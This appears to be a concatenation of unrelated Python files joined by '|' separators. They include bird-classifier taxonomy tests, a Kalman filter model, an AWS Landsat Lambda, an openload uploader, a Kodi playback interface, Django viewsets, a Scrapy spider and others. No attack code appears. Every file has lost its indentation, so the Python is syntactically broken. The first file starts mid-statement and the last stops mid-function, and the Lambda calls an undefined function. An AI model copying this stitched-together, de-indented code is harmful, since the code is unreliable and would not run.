== exp_output[level]["scientific_name"]
assert out1[level]["taxonomy_level_names"] \
== exp_output[level]["taxonomy_level_names"]
assert out1[level]["taxonomy_level_aliases"] \
== exp_output[level]["taxonomy_level_aliases"]
assert out1[level]["child_ids"] \
== exp_output[level]["child_ids"]
assert np.isclose(out1[level]["probability"],
exp_output[level]["probability"])
if 'id' in exp_output[level]:
assert out1[level]["id"] == exp_output[level]["id"]
# Make sure passing in pred_list or formatted_pred_dict results in the same
# output
out2 = get_best_candidates(pred_list=pred_list,
taxonomy=taxonomy,
hierarchical_consistency=False)
for level in out1.keys():
assert set(out1[level].keys()) == set(out2[level].keys())
for k in out1[level].keys():
assert out1[level][k] == out2[level][k]
# Make sure hierarchical consistency is correctly applied
out3 = get_best_candidates(formatted_pred_dict=formatted_pred_dict,
taxonomy=taxonomy)
exp_output = {}
exp_output['coarse'] = {'probability': coarse_pred[0]}
exp_output['coarse'].update(get_taxonomy_node("1", taxonomy))
exp_output['medium'] = {'probability': medium_pred[3]}
exp_output['medium'].update(get_taxonomy_node("1.4", taxonomy))
exp_output['fine'] = {'probability': fine_pred[9]}
exp_output['fine'].update(get_taxonomy_node("1.4.3", taxonomy))
# Make sure output is in expected format
assert set(out1.keys()) == set(taxonomy["output_encoding"].keys())
for level, cand_dict in out1.items():
assert isinstance(cand_dict, dict)
assert out3[level]["common_name"] == exp_output[level]["common_name"]
assert out3['fine']["scientific_name"] \
== exp_output['fine']["scientific_name"]
assert out3['fine']["taxonomy_level_names"] \
== exp_output['fine']["taxonomy_level_names"]
assert out3['fine']["taxonomy_level_aliases"] \
== exp_output['fine']["taxonomy_level_aliases"]
assert out3['fine']["child_ids"] \
== exp_output['fine']["child_ids"]
assert np.isclose(out3['fine']["probability"],
exp_output['fine']["probability"])
if 'id' in exp_output[level]:
assert out3[level]["id"] == exp_output[level]["id"]
# Test invalid inputs
pytest.raises(BirdVoxClassifyError, get_best_candidates,
pred_list=pred_list, formatted_pred_dict=formatted_pred_dict)
pytest.raises(BirdVoxClassifyError, get_best_candidates,
formatted_pred_dict=formatted_pred_dict, taxonomy=None)
pytest.raises(BirdVoxClassifyError, get_best_candidates,
pred_list=pred_list, taxonomy=None)
pytest.raises(BirdVoxClassifyError, get_best_candidates,
hierarchical_consistency=False,
pred_list=pred_list, taxonomy=None)
# Make sure a real prediction makes it through the pipeline with no problem
output = process_file(CHIRP_PATH, model_name=MODEL_NAME)
formatted_pred_dict = [x for x in output.values()][0]
out1 = get_best_candidates(formatted_pred_dict=formatted_pred_dict,
hierarchical_consistency=False)
out2 = get_best_candidates(formatted_pred_dict=formatted_pred_dict,
taxonomy=taxonomy)
def test_validate_taxonomy():
taxonomy = load_taxonomy(TAXV1_HIERARCHICAL_PATH)
_validate_taxonomy(taxonomy)
with open(TAXV1_HIERARCHICAL_PATH, 'r') as f:
taxonomy2 = json.load(f)
pytest.raises(ValueError, _validate_taxonomy, taxonomy2)
def test_apply_hierarchial_consistency():
taxonomy = load_taxonomy(TAXV1_HIERARCHICAL_PATH)
# HC Cand: "1"
coarse_pred = np.array([0.9])
# HC Cand: "1.4"
medium_pred = np.array([0.1, 0.0, 0.0, 0.8, 0.2])
# HC Cand: "1.4.3" (different class than without HC)
fine_pred = np.array([0.7, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.6,
0.0, 0.0, 0.0, 0.0, 0.3])
pred_list = [coarse_pred, medium_pred, fine_pred]
formatted_pred_dict = format_pred(pred_list, taxonomy)
out1 = apply_hierarchical_consistency(formatted_pred_dict, taxonomy)
exp_output = {}
exp_output['coarse'] = {'probability': coarse_pred[0]}
exp_output['coarse'].update(get_taxonomy_node("1", taxonomy))
exp_output['medium'] = {'probability': medium_pred[3]}
exp_output['medium'].update(get_taxonomy_node("1.4", taxonomy))
exp_output['fine'] = {'probability': fine_pred[9]}
exp_output['fine'].update(get_taxonomy_node("1.4.3", taxonomy))
# Make sure output is in expected format
assert set(out1.keys()) == set(taxonomy["output_encoding"].keys())
for level, cand_dict in out1.items():
assert isinstance(cand_dict, dict)
assert out1[level]["common_name"] == exp_output[level]["common_name"]
assert out1['fine']["scientific_name"] \
== exp_output['fine']["scientific_name"]
assert out1['fine']["taxonomy_level_names"] \
== exp_output['fine']["taxonomy_level_names"]
assert out1['fine']["taxonomy_level_aliases"] \
== exp_output['fine']["taxonomy_level_aliases"]
assert out1['fine']["child_ids"] \
== exp_output['fine']["child_ids"]
assert np.isclose(out1['fine']["probability"],
exp_output['fine']["probability"])
if 'id' in exp_output[level]:
assert out1[level]["id"] == exp_output[level]["id"]
# HC Cand: "1"
coarse_pred = np.array([0.9])
# HC Cand: "1.4"
medium_pred = np.array([0.1, 0.0, 0.0, 0.8, 0.2])
# HC Cand: "other" (wouldn't be other w/o HC)
fine_pred = np.array([0.7, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.3,
0.0, 0.0, 0.0, 0.0, 0.3])
pred_list = [coarse_pred, medium_pred, fine_pred]
formatted_pred_dict = format_pred(pred_list, taxonomy)
out2 = apply_hierarchical_consistency(formatted_pred_dict, taxonomy)
exp_output = {}
exp_output['coarse'] = {'probability': coarse_pred[0]}
exp_output['coarse'].update(get_taxonomy_node("1", taxonomy))
exp_output['medium'] = {'probability': medium_pred[3]}
exp_output['medium'].update(get_taxonomy_node("1.4", taxonomy))
exp_output["fine"] = {
"probability": 1 - fine_pred[9],
"common_name": "other",
"scientific_name": "other",
"taxonomy_level_names": "fine",
"taxonomy_level_aliases": {},
'child_ids': taxonomy["output_encoding"]["fine"][-1]["ids"]
}
# Make sure output is in expected format
assert set(out2.keys()) == set(taxonomy["output_encoding"].keys())
for level, cand_dict in out2.items():
assert isinstance(cand_dict, dict)
assert out2[level]["common_name"] == exp_output[level]["common_name"]
assert out2[level]["scientific_name"] \
== exp_output[level]["scientific_name"]
assert out2[level]["taxonomy_level_names"] \
== exp_output[level]["taxonomy_level_names"]
assert out2[level]["taxonomy_level_aliases"] \
== exp_output[level]["taxonomy_level_aliases"]
assert out2[level]["child_ids"] \
== exp_output[level]["child_ids"]
assert np.isclose(out2[level]["probability"],
exp_output[level]["probability"])
if 'id' in exp_output[level]:
assert out2[level]["id"] == exp_output[level]["id"]
# HC Cand: "other"
coarse_pred = np.array([0.1])
# HC Cand: "other" (wouldn't be other if not for previous level being other)
medium_pred = np.array([0.1, 0.0, 0.0, 0.8, 0.2])
# HC Cand: "other" (wouldn't be other if not for previous level being other)
fine_pred = np.array([0.7, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.6,
0.0, 0.0, 0.0, 0.0, 0.3])
pred_list = [coarse_pred, medium_pred, fine_pred]
formatted_pred_dict = format_pred(pred_list, taxonomy)
out3 = apply_hierarchical_consistency(formatted_pred_dict, taxonomy)
exp_output = {
"coarse": {
"probability": 1 - coarse_pred[0],
"common_name": "other",
"scientific_name": "other",
"taxonomy_level_names": "coarse",
"taxonomy_level_aliases": {},
'child_ids': taxonomy["output_encoding"]["coarse"][-1]["ids"]
},
"medium": {
"probability": 1 - coarse_pred[0],
"common_name": "other",
"scientific_name": "other",
"taxonomy_level_names": "medium",
"taxonomy_level_aliases": {},
'child_ids': taxonomy["output_encoding"]["medium"][-1]["ids"]
},
"fine": {
"probability": 1 - coarse_pred[0],
"common_name": "other",
"scientific_name": "other",
"taxonomy_level_names": "fine",
"taxonomy_level_aliases": {},
'child_ids': taxonomy["output_encoding"]["fine"][-1]["ids"]
}
}
# Make sure output is in expected format
assert set(out3.keys()) == set(taxonomy["output_encoding"].keys())
for level, cand_dict in out3.items():
assert isinstance(cand_dict, dict)
assert out3[level]["common_name"] == exp_output[level]["common_name"]
assert out3[level]["scientific_name"] \
== exp_output[level]["scientific_name"]
assert out3[level]["taxonomy_level_names"] \
== exp_output[level]["taxonomy_level_names"]
assert out3[level]["taxonomy_level_aliases"] \
== exp_output[level]["taxonomy_level_aliases"]
assert out3[level]["child_ids"] \
== exp_output[level]["child_ids"]
assert np.isclose(out3[level]["probability"],
exp_output[level]["probability"])
if 'id' in exp_output[level]:
assert out3[level]["id"] == exp_output[level]["id"]
# HC Cand: "1"
coarse_pred = np.array([0.9])
# HC Cand: "other"
medium_pred = np.array([0.1, 0.0, 0.0, 0.2, 0.8])
# HC Cand: "other" (wouldn't be other if not for previous level being other)
fine_pred = np.array([0.7, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.6,
0.0, 0.0, 0.0, 0.0, 0.3])
pred_list = [coarse_pred, medium_pred, fine_pred]
formatted_pred_dict = format_pred(pred_list, taxonomy)
out4 = apply_hierarchical_consistency(formatted_pred_dict, taxonomy)
exp_output = {}
exp_output['coarse'] = {'probability': coarse_pred[0]}
exp_output['coarse'].update(get_taxonomy_node("1", taxonomy))
exp_output['medium'] = {
"probability": 1 - medium_pred[3],
"common_name": "other",
"scientific_name": "other",
"taxonomy_level_names": "medium",
"taxonomy_level_aliases": {},
'child_ids': taxonomy["output_encoding"]["medium"][-1]["ids"]
}
exp_output['fine'] = {
"probability": 1 - medium_pred[3],
"common_name": "other",
"scientific_name": "other",
"taxonomy_level_names": "fine",
"taxonomy_level_aliases": {},
'child_ids': taxonomy["output_encoding"]["fine"][-1]["ids"]
}
# Make sure output is in expected format
assert set(out4.keys()) == set(taxonomy["output_encoding"].keys())
for level, cand_dict in out4.items():
assert isinstance(cand_dict, dict)
assert out4[level]["common_name"] == exp_output[level]["common_name"]
assert out4[level]["scientific_name"] \
== exp_output[level]["scientific_name"]
assert out4[level]["taxonomy_level_names"] \
== exp_output[level]["taxonomy_level_names"]
assert out4[level]["taxonomy_level_aliases"] \
== exp_output[level]["taxonomy_level_aliases"]
assert out4[level]["child_ids"] \
== exp_output[level]["child_ids"]
assert np.isclose(out4[level]["probability"],
exp_output[level]["probability"])
if 'id' in exp_output[level]:
assert out4[level]["id"] == exp_output[level]["id"]
# Test with custom level_threshold_dict
level_threshold_dict = {
"coarse": 0.99,
"medium": 0.99,
"fine": 0.99
}
# HC Cand: "other" (due to threshold)
coarse_pred = np.array([0.9])
# HC Cand: "other"
medium_pred = np.array([0.1, 0.0, 0.0, 0.8, 0.2])
# HC Cand: "other"
fine_pred = np.array([0.7, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.6,
0.0, 0.0, 0.0, 0.0, 0.3])
pred_list = [coarse_pred, medium_pred, fine_pred]
formatted_pred_dict = format_pred(pred_list, taxonomy)
out5 = apply_hierarchical_consistency(formatted_pred_dict, taxonomy,
level_threshold_dict=level_threshold_dict)
exp_output = {}
exp_output['coarse'] = {
"probability": 1 - coarse_pred[0],
"common_name": "other",
"scientific_name": "other",
"taxonomy_level_names": "coarse",
"taxonomy_level_aliases": {},
'child_ids': taxonomy["output_encoding"]["coarse"][-1]["ids"]
}
exp_output['medium'] = {
"probability": 1 - coarse_pred[0],
"common_name": "other",
"scientific_name": "other",
"taxonomy_level_names": "medium",
"taxonomy_level_aliases": {},
'child_ids': taxonomy["output_encoding"]["medium"][-1]["ids"]
}
exp_output['fine'] = {
"probability": 1 - coarse_pred[0],
"common_name": "other",
"scientific_name": "other",
"taxonomy_level_names": "fine",
"taxonomy_level_aliases": {},
'child_ids': taxonomy["output_encoding"]["fine"][-1]["ids"]
}
# Make sure output is in expected format
assert set(out5.keys()) == set(taxonomy["output_encoding"].keys())
for level, cand_dict in out5.items():
assert isinstance(cand_dict, dict)
assert out5[level]["common_name"] == exp_output[level]["common_name"]
assert out5[level]["scientific_name"] \
== exp_output[level]["scientific_name"]
assert out5[level]["taxonomy_level_names"] \
== exp_output[level]["taxonomy_level_names"]
assert out5[level]["taxonomy_level_aliases"] \
== exp_output[level]["taxonomy_level_aliases"]
assert out5[level]["child_ids"] \
== exp_output[level]["child_ids"]
assert np.isclose(out5[level]["probability"],
exp_output[level]["probability"])
if 'id' in exp_output[level]:
assert out5[level]["id"] == exp_output[level]["id"]
# Check invalid inputs
pytest.raises(BirdVoxClassifyError, apply_hierarchical_consistency,
formatted_pred_dict, taxonomy, detection_threshold=-1)
# Check invalid inputs
pytest.raises(BirdVoxClassifyError, apply_hierarchical_consistency,
formatted_pred_dict, taxonomy, level_threshold_dict={
'coarse': -1,
'medium': -1,
'fine': -1
})
pytest.raises(BirdVoxClassifyError, apply_hierarchical_consistency,
formatted_pred_dict, taxonomy, level_threshold_dict={
'garply': 0.1
})
|
"""Private module; avoid importing from directly.
"""
import abc
from typing import Tuple
import torch
import torch.nn as nn
from overrides import overrides
from .. import types
class KalmanFilterMeasurementModel(abc.ABC, nn.Module):
def __init__(self, *, state_dim, observation_dim):
super().__init__()
self.state_dim = state_dim
"""int: State dimensionality."""
self.observation_dim = observation_dim
"""int: Observation dimensionality."""
@abc.abstractmethod
# @overrides
def forward(
self, *, states: types.StatesTorch
) -> Tuple[types.ObservationsNoDictTorch, types.ScaleTrilTorch]:
"""Observation model forward pass, over batch size `N`.
Args:
states (torch.Tensor): States to pass to our observation model.
Shape should be `(N, state_dim)`.
Returns:
Tuple[torch.Tensor, torch.Tensor]: tuple containing expected observations
and cholesky decomposition of covariance. Shape should be `(N, M)`.
"""
def jacobian(self, *, states: types.StatesTorch) -> torch.Tensor:
"""Returns Jacobian of the measurement model.
Args:
states (torch.Tensor): Current state, size `(N, state_dim)`.
Returns:
torch.Tensor: Jacobian, size `(N, observation_dim, state_dim)`
"""
observation_dim = self.observation_dim
with torch.enable_grad():
x = states.detach().clone()
N, ndim = x.shape
assert ndim == self.state_dim
x = x[:, None, :].expand((N, observation_dim, ndim))
x.requires_grad_(True)
y = self(states=x.reshape((-1, ndim)))[0].reshape((N, -1, observation_dim))
mask = torch.eye(observation_dim, device=x.device).repeat(N, 1, 1)
jac = torch.autograd.grad(y, x, mask, create_graph=True)
return jac[0]
|
# AWS Lambda function for returning list of landsat scenes ids for input path/row
import json
import boto3
event = {
"queryStringParameters": {
"path": "143",
"row": "37"
}
}
def landsat_handler(event):
# parse event
path = event['queryStringParameters']['path']
row = event['queryStringParameters']['row']
path = path.zfill(3)
row = row.zfill(3)
if int(path) > 233 or int(row) > 233:
return bad_request()
# search landsat s3 bucket
s3 = boto3.client('s3', region_name='us-west-2')
params = {
'Bucket': 'landsat-pds',
'Prefix': f'c1/L8/{path}/{row}/',
'Delimiter': '/'
}
dirs = []
s3Response = s3.list_objects_v2(**params)
prefixes = s3Response['CommonPrefixes']
for prefix in prefixes:
raw_dir = list(prefix.values())
dirs.append(raw_dir[0])
# construct body of response object
landsatResponse = {}
landsatResponse['Dirs'] = dirs
landsatResponse['Message'] = 'Hello from lambda land'
# construct http response object
responseObject = {}
responseObject['statusCode'] = 200
responseObject['headers'] = {}
responseObject['headers']['Content-Type'] = 'application/json'
responseObject['body'] = json.dumps(landsatResponse)
# return
return responseObject
responseObject = add_zero(path)
print(responseObject)
|
import requests
import json
HOSTER_NAME = "openload"
HOSTER_HAS_DIRECT_LINKS = False
HOSTER_KEEP_UNAVAILABLE_UPLOADS = False
OPENLOAD_CO_UPLOAD_URL = "https://api.openload.co/1/file/ul"
def linkFromId(id):
return "https://openload.co/embed/" + id
def upload(filename):
print("[openload] Requesting upload slot...")
result = requests.get(OPENLOAD_CO_UPLOAD_URL)
uploadSlot = json.loads(result.text)
if uploadSlot["status"] != 200:
print("Requesting upload failed.")
return ""
print("[openload] Starting upload...")
result = requests.post(
uploadSlot["result"]["url"],
files = {
"file1": open(filename, "rb")
}
)
return json.loads(result.text)["result"]["id"]
|
from googletrans import Translator
from BingTTS import TTS
#翻譯
def translate(input,language_to):
translate = Translator()
if language_to in lan:
#say = '你好嗎'
result = translate.translate(input ,dest=lan.get(language_to))
#result = translate.translate(say ,dest=lan.get('日文'))
#result = translate.translate('我想吃晚餐',dest=lan.get('日文'))
#speak(result.text,lan.get(l))
TTS(result.text,language_to)
#print (result.text)
return result.text
else:
TTS('我不懂','中文')
#翻譯語言
lan = {
'英文':'en',
'中文':'zh-TW',
'日文':'ja',
'德文':'de',
'法文':'fr',
'韓文':'ko',
'泰文':'th'
}
#translate(None)
#translate('你好嗎','日文')
#translate(speech('請選擇要翻譯的語言',2,3), speech('正在翻譯...',2,2))
|
# -*- coding: utf-8 -*-
"""
Copyright (C) 2021 Stefano Gottardo (script.appcast)
An interface to provide a communication between Kodi and a DIAL app
SPDX-License-Identifier: MIT
See LICENSES/MIT.md for more information.
"""
import json
import threading
from copy import deepcopy
import xbmc
import resources.lib.helpers.kodi_ops as kodi_ops
from resources.lib.globals import G
from resources.lib.helpers.logging import LOG
class KodiInterface:
"""
Provides callbacks on Kodi events and methods to obtaining data from Kodi (see 'kodi' variable in app.py)
"""
def __init__(self, apps):
self._apps = apps
self._mutex = threading.Lock()
# Todo: make event callbacks switchable when we change app with another app
self._active_app = None
self.player = Player(self)
self.monitor = Monitor(self)
@property
def active_app(self):
return self._active_app
@active_app.setter
def active_app(self, value):
self.player._active_app = value
self._active_app = value
def play_url(self, app, **kwargs):
"""
Play a video
:param app: Specify the DialApp class (use 'self')
:param kwargs: kwargs to format ADDON_PLAY_PATH string (not mandatory)
"""
# Before call the add-on to run the video,
# we must inform our player class interface that we start a video by a DIAL app
# Todo: make event callbacks switchable when we change app with another app
if self.active_app is None or (self.active_app and not isinstance(self.active_app, app.__class__)):
self.active_app = app
self.player.notify_video_started()
self.player.play(app.ADDON_PLAY_PATH.format(**kwargs))
def notify_play(self, app):
"""Notify the interface that will be played a new audio/video content"""
if self.active_app is None or (self.active_app and not isinstance(self.active_app, app.__class__)):
self.active_app = app
self.player.notify_video_started()
def _notify_apps(self, callback_name, data=None):
if self._active_app is None:
LOG.warn('Ignored Kodi callback {}, no app currently active', callback_name)
return False
self._mutex.acquire()
LOG.debug('Notify Kodi callback {} to {} with data: {}', callback_name, self._active_app.DIAL_APP_NAME, data)
ret = self._execute_notify(self._active_app, callback_name, data)
self._mutex.release()
return ret
def _notify_all_apps(self, callback_name, data=None, extra_data_app=None):
for _app in self._apps:
_data = deepcopy(data)
if extra_data_app[0] == self._active_app:
# If current app then send extra data only for this app
_data.update(extra_data_app[1])
LOG.debug('Notify Kodi callback {} to {} with data: {}', callback_name, _app.DIAL_APP_NAME, _data)
self._execute_notify(_app, callback_name, _data)
@staticmethod
def _execute_notify(app, callback_name, data):
try:
method = getattr(app, callback_name)
method(data)
return True
except Exception: # pylint: disable=broad-except
LOG.error('The app {} has raised the following error on {} callback:',
app.DIAL_APP_NAME, callback_name)
import traceback
LOG.error(traceback.format_exc())
return False
@staticmethod
def get_volume():
"""Get the current value of the Kodi volume and mute state"""
return kodi_ops.json_rpc('Application.GetProperties', {'properties': ['volume', 'muted']})
@staticmethod
def set_volume(value):
"""Change the Kodi volume"""
kodi_ops.json_rpc('Application.SetVolume', {'volume': value})
@staticmethod
def set_mute(value):
"""Change the Kodi mute state"""
kodi_ops.json_rpc('Application.SetMute', {'mute': value})
@staticmethod
def show_notification_connected(**kwargs):
kodi_ops.show_notification(kodi_ops.get_local_string(32000).format(**kwargs))
@staticmethod
def show_notification_disconnected(**kwargs):
kodi_ops.show_notification(kodi_ops.get_local_string(32001).format(**kwargs))
@property
def get_ssdp_friendly_name(self):
return G.SP_FRIENDLY_NAME
@property
def get_ssdp_device_uuid(self):
return G.DEVICE_UUID
class Player(xbmc.Player):
def __init__(self, kodi_interface: KodiInterface):
self._kodi_interface = kodi_interface
self._is_tracking_enabled = False
self._started_by_app = False
self._init_count = 0
self._playback_tick = None
super().__init__()
def notify_video_started(self):
"""Notify that a video is started by a call from a DIAL app (see 'play_url' in app.py)"""
self._started_by_app = True
self._is_tracking_enabled = True
def onPlayBackStarted(self):
"""Will be called when Kodi player starts. Video or audio might not be available at this point."""
if not self._is_tracking_enabled:
return
if self._init_count > 0:
# In this case the user has chosen to play another video while another one is in playing,
# then we send the missing Stop event for the current video
self._on_stop('stopped')
if self._started_by_app:
self._init_count += 1
self._started_by_app = False
def onAVStarted(self):
"""Kodi is actually playing a media file (i.e stream is available)"""
if not self._is_tracking_enabled:
return
self._notify_apps('on_playback_started')
if (self._kodi_interface.active_app.CB_TICK_SECS is not None
and (self._playback_tick is None or not self._playback_tick.is_alive())):
self._playback_tick = PlaybackTick(self._kodi_interface._notify_apps,
self._kodi_interface.active_app.CB_TICK_SECS)
self._playback_tick.setDaemon(True)
self._playback_tick.start()
def onPlayBackPaused(self):
if not self._is_tracking_enabled:
return
self._playback_tick.is_playback_paused = True
self._kodi_interface._notify_apps('on_playback_paused')
def onPlayBackResumed(self):
if not self._is_tracking_enabled:
return
# Kodi call this event instead the "Player.OnStop" event when you try to play a video
# while another one is in playing
if not self._playback_tick.is_playback_paused:
return
self._kodi_interface._notify_apps('on_playback_resumed')
self._playback_tick.is_playback_paused = False
def onPlayBackSeek(self, time, seek_offset):
if not self._is_tracking_enabled:
return
self._kodi_interface._notify_apps('on_playback_seek', {'time': time, 'seek_offset': seek_offset})
def onPlayBackEnded(self):
"""Will be called when Kodi stops playing a file (at the end)"""
if not self._is_tracking_enabled:
return
self._on_stop('ended')
def onPlayBackStopped(self):
"""Will be called when User stops Kodi playing a file"""
if not self._is_tracking_enabled:
return
self._on_stop('stopped')
def onPlayBackError(self):
"""Will be called when playback stops due to an error"""
if not self._is_tracking_enabled:
return
self._on_stop('error')
def _on_stop(self, state):
if not self._is_tracking_enabled:
return
self._init_count -= 1
if self._init_count == 0: # If 0 means that no next video will be played from us
self._is_tracking_enabled = False
if self._playback_tick and self._playback_tick.is_alive():
self._playback_tick.stop_join()
self._playback_tick = None
self._kodi_interface._notify_apps('on_playback_stopped', {'status': state})
@property
def is_in_playing(self):
"""Whether the player is currently playing.
This is different from `self.isPlaying()`
in that it returns `False` if the player is paused or otherwise not actively playing."""
return xbmc.getCondVisibility('Player.Playing')
@property
def is_paused(self):
return xbmc.getCondVisibility("Player.Paused")
@property
def is_tracking_enabled(self):
return self._is_tracking_enabled
class Monitor(xbmc.Monitor):
def __init__(self, kodi_interface: KodiInterface):
self._kodi_interface = kodi_interface
super().__init__()
def onNotification(self, sender, method, data):
if method == 'Application.OnVolumeChanged':
self._kodi_interface._notify_apps('on_volume_changed', json.loads(data))
elif method == 'System.OnQuit':
extra_data_app = (self._kodi_interface.active_app,
{'was_in_playing': self._kodi_interface.player.is_tracking_enabled})
self._kodi_interface._notify_all_apps('on_kodi_close', json.loads(data), extra_data_app)
class PlaybackTick(threading.Thread):
"""Thread to send a notification every (n) secs of playback"""
def __init__(self, notify_apps, timeout_secs):
self._notify_apps = notify_apps
self._timeout_secs = timeout_secs
self._stop_event = threading.Event()
self.is_playback_paused = False
super().__init__()
def run(self):
while not self._stop_event.is_set():
if not self._notify_apps('on_playback_tick', {'is_playback_paused': self.is_playback_paused}):
LOG.warn('PlaybackTick: Interrupted due to an error')
break
if self._stop_event.wait(self._timeout_secs):
break # Stop requested by stop_join
def stop_join(self):
self._stop_event.set()
self.join()
|
from rest_framework import authentication
from task_profile.models import TaskerProfile, CustomerProfile, Notification, InviteCode
from .serializers import (
TaskerProfileSerializer,
CustomerProfileSerializer,
NotificationSerializer,
InviteCodeSerializer,
)
from rest_framework import viewsets
class NotificationViewSet(viewsets.ModelViewSet):
serializer_class = NotificationSerializer
authentication_classes = (
authentication.SessionAuthentication,
authentication.TokenAuthentication,
)
queryset = Notification.objects.all()
class InviteCodeViewSet(viewsets.ModelViewSet):
serializer_class = InviteCodeSerializer
authentication_classes = (
authentication.SessionAuthentication,
authentication.TokenAuthentication,
)
queryset = InviteCode.objects.all()
class CustomerProfileViewSet(viewsets.ModelViewSet):
serializer_class = CustomerProfileSerializer
authentication_classes = (
authentication.SessionAuthentication,
authentication.TokenAuthentication,
)
queryset = CustomerProfile.objects.all()
class TaskerProfileViewSet(viewsets.ModelViewSet):
serializer_class = TaskerProfileSerializer
authentication_classes = (
authentication.SessionAuthentication,
authentication.TokenAuthentication,
)
queryset = TaskerProfile.objects.all()
|
import scrapy
from webscraper.scrape import get_content
class EntSpider(scrapy.Spider):
name = "ent"
allowed_domains = ["reddit.com", "twitter.com", "gamepedia.com", "fandom.com"]
start_urls = [
"https://www.reddit.com",
# "https://www.facebook.com",
"https://www.twitter.com",
"https://www.gamepedia.com",
"https://www.fandom.com",
]
def parse(self, response):
if response.status == 200:
content = get_content(response)
yield content
yield from response.follow_all(
content["urls"],
callback = self.parse,
meta = {
"backlink": response.url
}
)
|
#!/usr/local/bin/python3
# I used a couple of different random data generators to
# get some of this data. Including fakenamegenerator.com
# and mockaroo.com
# The URLs supplied by mockaroo.com had a whole ton of
# lorem=ipsum&dingdong=hoohaw&bob=loblaw type args.
# In fact, they were too many for a human (me) to read the URL.
# This dumb script takes those lengthy arguments and
# shortens them up into something eyeball-parseable
import re
import random
import hashlib
args = random.randrange(2,6)
urls = './wordlists/urls.txt'
with open(urls,'rt') as urls:
url_list = []
for line in urls:
line = line.strip()
url_list.append(line)
urls.close()
for url in url_list:
start_regexp = "(^http.+?\&.*"
middle_regexp = "?\&.*"
end_regexp = "?[^&]+)"
random_args = middle_regexp * args
regexp = start_regexp + random_args + end_regexp
shortner_url = re.compile(regexp)
try:
matching_url = shortner_url.match(url)
shorter_url = matching_url.group(0)
print(shorter_url)
except:
#print("can't match URL - SORRY")
continue
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import urllib
from openstack import exceptions
from openstack import resource
class Info(resource.Resource):
base_path = "/info"
allow_fetch = True
_query_mapping = resource.QueryParameters(
'swiftinfo_sig', 'swiftinfo_expires'
)
# Properties
swift = resource.Body("swift", type=dict)
slo = resource.Body("slo", type=dict)
staticweb = resource.Body("staticweb", type=dict)
tempurl = resource.Body("tempurl", type=dict)
def fetch(self, session, requires_id=False,
base_path=None, error_message=None):
"""Get a remote resource based on this instance.
:param session: The session to use for making this request.
:type session: :class:`~keystoneauth1.adapter.Adapter`
:param boolean requires_id: A boolean indicating whether resource ID
should be part of the requested URI.
:param str base_path: Base part of the URI for fetching resources, if
different from
:data:`~openstack.resource.Resource.base_path`.
:param str error_message: An Error message to be returned if
requested object does not exist.
:return: This :class:`Resource` instance.
:raises: :exc:`~openstack.exceptions.MethodNotSupported` if
:data:`Resource.allow_fetch` is not set to ``True``.
:raises: :exc:`~openstack.exceptions.ResourceNotFound` if
the resource was not found.
"""
if not self.allow_fetch:
raise exceptions.MethodNotSupported(self, "fetch")
# The endpoint in the catalog has version and project-id in it
# To get capabilities, we have to disassemble and reassemble the URL
# This logic is taken from swiftclient
session = self._get_session(session)
endpoint = urllib.parse.urlparse(session.get_endpoint())
url = "{scheme}://{netloc}/info".format(
scheme=endpoint.scheme, netloc=endpoint.netloc)
microversion = self._get_microversion_for(session, 'fetch')
response = session.get(url, microversion=microversion)
kwargs = {}
if error_message:
kwargs['error_message'] = error_message
self.microversion = microversion
self._translate_response(response, **kwargs)
return self
|
import re
from ClusterSImilarity import FuzzyClusterSimilarity
import pprint
class RoleDictionary:
actor_filenames= ['Phoenix.Countries.actors.txt',
'Phoenix.International.actors.txt',
'Phoenix.MilNonState.actors.txt']
folder = 'data/dictionaries'
actor_set = set()
actor_roles = {}
similarityMeasure = FuzzyClusterSimilarity()
def __init__(self, similarityMeasure=FuzzyClusterSimilarity()):
self.similarityMeasure = similarityMeasure
for filename in self.actor_filenames:
fs = open(self.folder + "/" + filename)
current_roles = set()
current_actors = []
for line in fs:
line = line.strip()
if line.startswith('#') or len(line.strip()) == 0: # if it is a comment
continue
line = line.split('#')[0]
words = line.strip().split("\t")
for i in range(0, len(words)):
w = words[i].strip()
if not w.startswith('+') and not w.strip().startswith('['):
#print "NEW ACTOR ", current_actors
for actor in current_actors:
if actor in self.actor_roles:
self.actor_roles[actor].union(current_roles)
else:
self.actor_roles[actor] = current_roles
#self.actor_roles[actor] = current_roles
current_actors = []
current_roles = set()
current_actors.append(w.replace('_',' ').strip())
elif w.startswith('+'):
#line.replace()
current_actors.append(w.replace('+','').replace("_"," ").strip())
else:
matched = re.match(r'\[[^\]]*\]',w)
role_with_date = matched.group(0)
current_roles.add(role_with_date[1:len(role_with_date)-1].split(' ')[0])
#print current_roles
fs.close()
#pprint.pprint( self.actor_roles)
def roles(self, actorname):
temp = actorname.replace('_',' ').strip()
# maxKey = None
# maxMatch = 100
# for key in self.actor_roles:
# match = self.similarityMeasure.measure(key, temp)
# if match > maxMatch:
# maxKey = key
# maxMatch = match
return {temp: self.actor_roles.get(temp)}
print 'Running'
roleDict = RoleDictionary()
print "initialized"
#roleDict.contains('test')
print roleDict.roles('BARACK_OBAMA')
|
import os
import os.path as osp
import cv2
import numpy as np
import json
import trimesh
import argparse
# os.environ["PYOPENGL_PLATFORM"] = "egl"
# os.environ["PYOPENGL_PLATFORM"] = "osmesa"
import pyrender
import PIL.Image as pil_img
import pickle
import smplx
import torch
def main(args):
fitting_dir = args.fitting_dir
recording_name = os.path.abspath(fitting_dir).split("/")[-1]
female_subjects_ids = [162, 3452, 159, 3403]
subject_id = int(recording_name.split('_')[1])
if subject_id in female_subjects_ids:
gender = 'female'
else:
gender = 'male'
pkl_files_dir = osp.join(fitting_dir, 'results')
scene_name = recording_name.split("_")[0]
base_dir = args.base_dir
cam2world_dir = osp.join(base_dir, 'cam2world')
scene_dir = osp.join(base_dir, 'scenes')
recording_dir = osp.join(base_dir, 'recordings', recording_name)
